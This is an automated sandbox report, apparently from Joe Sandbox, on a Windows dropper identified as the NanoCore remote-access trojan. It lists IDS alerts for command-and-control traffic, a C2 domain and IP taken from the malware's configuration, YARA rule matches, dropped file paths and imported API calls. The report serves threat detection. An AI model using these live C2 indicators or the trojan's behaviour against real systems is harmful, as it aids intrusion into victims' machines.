Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49767 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49767 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49768 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49768 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49774 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49774 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49776 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49776 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49777 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49777 -> 185.19.85.141:2702
Source: Traffic	Snort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 185.19.85.141:2702 -> 192.168.2.3:49777

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: stonecold.ddns.net

Uses dynamic DNS services

Source: unknown

DNS query: name: stonecold.ddns.net

Source: Joe Sandbox View

ASN Name: DATAWIRE-ASCH DATAWIRE-ASCH

Source: Joe Sandbox View

IP Address: 185.19.85.141 185.19.85.141

Source: global traffic

TCP traffic: 192.168.2.3:49743 -> 185.19.85.141:2702

Source: xeWd55M5Lb.exe

String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: unknown

DNS traffic detected: queries for: stonecold.ddns.net

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405809

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: xeWd55M5Lb.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6696 -s 628

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe

Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403640

Source: C:\Users\user\Desktop\xeWd55M5Lb.exe	Code function: 0_2_00406D5F	0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_004031FA	1_2_004031FA
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_00409C02	1_2_00409C02
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_0040A174	1_2_0040A174
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_00409690	1_2_00409690
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_0040777E	1_2_0040777E
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_0040B3E1	1_2_0040B3E1
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_0040C3AD	1_2_0040C3AD
Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exe	Code function: 1_2_009F0BE0	1_2_009F0BE0
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 6_2_004031FA	6_2_004031FA
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 6_2_00409C02	6_2_00409C02
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 6_2_0040A174	6_2_0040A174
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 6_2_00409690	6_2_00409690
Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe	Code function: 6_2_0040777E	6_2_0040777E
